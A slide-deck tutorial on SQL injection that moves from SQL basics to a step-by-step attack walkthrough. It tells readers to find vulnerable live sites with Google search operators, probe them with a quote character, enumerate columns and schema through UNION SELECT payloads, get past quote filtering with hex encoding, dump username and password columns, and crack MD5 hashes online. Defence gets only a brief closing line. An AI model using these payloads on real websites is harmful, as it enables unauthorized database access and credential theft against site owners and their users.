SQL Injection

What is SQL?
• Structured Query Language (SQL) is basically a
textual language that enables interaction with a
database server.
• SQL commands such as SELECT,INSERT,
RETRIEVE, UPDATE, ALTER, DELETE, DROP
are used to perform operations on the database.
• Programmers use these commands to
manipulate data in the database server.
What is SQL Injection?
• SQL Injection is most common vulnerability on
the Internet.
• It is a flaw in Web Applications and not a
Database or Web server issue.
• Most programmers are still not aware of this
threat.
• SQL Injection is a basic attack used to either
gain unauthorized access to a database or to
retrieve information directly from the database.
 What is SQL Injection?
• SQL Injection is defined as a technique that
takes advantage of non-validated input
vulnerabilities and injects SQL commands.
• Programmers use sequential SQL commands
with client supplied parameters making it easier
for attackers to inject commands.
• Attackers can easily execute random SQL
queries on the database server through a web
application.
How Web Application works?
SQL Injection Attacks
• Based on the application and how it processes
user-supplied data, SQL Injection can be used
to perform the following types of attacks.

• Authentication Bypass
• Information Disclosure
• Compromised Data Integrity
• Compromised Availability of Data
• Remote Code Execution
• Authentication Bypass:
Using this attack, an attacker logs on to an
application without providing valid username and
password and gains administrative privileges.
• Information Disclosure:
Using this attack, an attacker obtains
sensitive information that is sorted in the
database.
• Compromised Data Integrity:
An attacker uses this attack to deface a web
page, insert malicious content into web pages, or
alter the contents of a database.
• Compromised Availability of Data:
Attackers use this attack to delete the
database information, delete log, or audit
information that is contained in a database.
• Remote Code Execution:
It allows an attacker to compromise the host
operating system.
Server Side Technologies
• Powerful server-side technologies like ASP.NET
and database servers allow developers to
create dynamic, data-driven Websites with
incredible ease.
• The power of ASP.NET and SQL can easily be
exploited by hackers using SQL Injection
attacks.
• All relational databases SQL Server, Oracle,
IBM DB2, and MYSQL are susceptible to SQL
Injection attacks.
 SQL Database Tables
• A relational database contains one or more
tables identified each by a name.
• Tables contain records (rows) with data.
• For example, the following table is called "users"
and contains data distributed in rows and
columns.:

User ID User Name Password

1 Smith 123
2 John Abc
 SQL Queries
• Using the previous table, a query like this:
SELECT User Name FROM users
WHERE User ID = 1;
• Gives a result set like this:
• User Name
Smith
• Select Password from users where user id=2;
• Gives result as Password
Abc
SQL Injection Characters
• ' or " character String Indicators
• -- or # single-line comment
• /*…*/ multiple-line comment
• + addition, concatenate (or
space
in URL )
• || (double pipe) concatenate
• % wildcard attribute indicator
• PRINT useful as non transactional
command
• @variable local variable
• @@variable global variable
The power of ‘ (single quote) :
• It closes the string parameter.
• Everything after is considered part of the SQL
command.
How does SQL Injection works?
• SQL injection works because programmers
don't properly escape SQL queries that use
data submitted by an untrusted source.
• The most common place for this vulnerability to
be exploited is on dynamic web forms.
• If a user submits text that has correctly
formatted SQL code in it and the server-side
software does not prevent that SQL code from
being run by the database during the database
query, the user has successfully injected SQL
into the database query.
Vulnerable Applications
• Almost all SQL databases and programming
languages are potentially vulnerable
– MS SQL Server, Oracle, MYSQL, DB2,
– MS Access, Sybase, Informix, etc,.

• Accessed through applications developed using:

– Perl and CGI scripts that access database.
– ASP, JSP, PHP
– XML, XSL and XSQL
– Java script
Finding vulnerable sites:
• Open Google home page and try the following
examples (this can be edited to whatever you
like)
• Inurl:php?id=
• inurl:asp?id= OR
• inurl:php?id= site:co.in (for domain specific sites)
• There are many more types of sites that are
vulnerable to SQL injections we will be working
with these few for now.
Test if a website is vulnerable:
• So we have a list of sites, let’s try and test them
to see if they maybe vulnerable to injection.
• We do this by adding a ' (single quote) character
to the end of the URL and seeing if we get any
form of error message.
• Example: www.site.com/index.php?id=1234’
• Error messages will vary from an on screen
message or the page may just go blank
 How many Columns?
• So now we have found a site that throw up
errors, we will try to identify how many columns
are on the site.
• We do this by using the ORDER BY command.
• www.site.com/index.php?id=1234 order by 1--
• You will be increasing the number 1 looking for
the number of columns present on the website.
• Ok let’s say the site has 6 columns, we need to
increase the number from 1 to 7 to find this out I
would usually get an error or a blank page.
• www.site.com/index.php?id=1234 order by 2--
• ……..
• …….
• ………
• www.site.com/index.php?id=1234 order by 6--
• The page still displays the same with no changes
so I increase to 7
• www.site.com/index.php?id=1234 order by 7--
• Now I get an error message that says
• Unknown column ‘7' in 'order clause'
• So its clear that the site contains 6 columns in it.
 Vulnerable columns
• So we have identified the number of columns
now we will use the UNION SELECT ALL
command to identify vulnerable columns.
• In the following command you will need to
replace the numbers with the number of columns
you have found on the site.
• www.site.com/index.php?id=1234 union select
1,2,3,4,5,6--
• This will display the number of vulnerable
column on your screen.
• Number 3 is displayed on the website, This
means that column number 3 is vulnerable.
Check what version and database running::

• There are 2 methods to check the version() and

database() running on the server.
• Just replace the vulnerable column number with
version() or database().
• Vulnerable column is number 3.
• www.site.com/index.php?id=1234 union select
1,2,version(),4,5,6--
• www.site.com/index.php?id=1234 union select
1,2,database(),4,5,6--
• www.site.com/index.php?id=1234 union select
1,2,user(),4,5,6--
 Differences between SQL server v4.0 and v5.0

Version 4.0 Version 5.0

1) In SQL version 4 there in no 1) SQL version 5 is much easier to do
information_schema. This means that as it has the information schema to
the table names must be guessed. work with.
Users
Admin
Members
2) Then there are the column names 2) Information schema lets you see
for the table which often contain what databases, tables and columns
common names, here are a few below are held in the SQL server.
Username
Password
Email
3) With many more possibilities, so as
you can see SQL version 4 can be a
huge guessing game.
 What is information_schema?
• In MySQL version 5.02 and above there is an
additional database called information_schema.
• This database provides access to the database
metadata.
• This includes the name of a database or a table, the
data type of a column, access privileges, etc.
• information_schema is the information database
where the information about all the other databases
is kept.
• The MySQL server automatically populates the
tables in the information_schema.
• The important thing to remember about the
information_schema database is that you can query
it, but you cannot change its structure or modify its
data.
• Information_schema.tables:
• The INFORMATION_SCHEMA.TABLES allows
you to get information about all tables and views
within a database.
• By default it will show you the information for every
single table and view that is in the database.

• Information_schema.columns:
• The INFORMATION_SCHEMA.COLUMNS view
allows you to get information about all columns for
all tables and views within a database.
• By default it will show you this information for
every single table and view that is in the database.
What is group_concat() ?
• GROUP_CONCAT() function is used to
concatenate all the values into a single string.
• Concatenate or concat() is linking all the group
values into a single string
• Group_concat() : This function returns a string
result with the concatenated non-NULL values
from a group.
 Finding Table names:
• www.site.com/index.php?id=1234 union select
1,2,group_concat(table_name),4,5,6 from
information_schema.tables where
table_schema=database()—
• It returns all the table names present in the
database.
• As you can see some interesting table names
like
• Admin
• Users
• Members
Finding Column names:
• The next step will be viewing the columns that
reside in the table we choose.
• In this case I will choose ‘USERS’ but you could
choose any table you want.
• The command used to view columns inside the
tables is usually
• www.site.com/index.php?id=1234 union select
1,2,group_concat(column_name),4,5,6 from
information_schema.columns where
table_name=‘users’--
• If there is an error it means single quotes must be
bypassed.
• So we should encode the string table name
users into hex format.
• you can use this website to convert string into
hexadecimal
http://www.string-functions.com/string-hex.aspx
• In programming languages, a hexadecimal
number is usually prefixed with '0x' to make
the compiler aware that you are using
hexadecimal.
• www.site.com/index.php?id=1234 union select
1,2,group_concat(column_name),4,5,6 from
information_schema.columns where table_name
=0x7573657273--
• ‘Users’ hex code is 7573657273
Finding Username and Password:
• Previous Query returns all the column names
present in the table ‘USERS’.
• Now all we have left to do is to view the data
inside of the columns in this case, Select some
interesting column names like username and
password.
• www.site.com/index.php?id=1234 union select
1,2,group_concat(username,0x3a,password),4,5
,6 from users—
• 0x3a is nothing but space between username
and password.
• That’s it you have the list of usernames and
passwords.
 Password Decryption:
Usually when you retrieve the passwords from an
SQL database they will be encrypted usually in MD5
SHA1 or MYSQL encryption.
Here are a few passwords that have been taken from
a table called users from columns email and
password.
steve@abc:10f91c20b4c3585667c1259a4356bf26
elliott@xyz:a54499cd4a6b5735339a491f394da8a1:
MD5 hash bit is
10f91c20b4c3585667c1259a4356bf26
The password has been decrypted by using this
website http://md5decrypter.co.uk/
And the password is inondation
 Conclusion
• SQL Injection is a fascinating and dangerous
vulnerability.
• All programming languages and all SQL
databases are potentially vulnerable.
• Protecting against it requires
– strong design.
– correct input validation.
7#4/\/|< y0U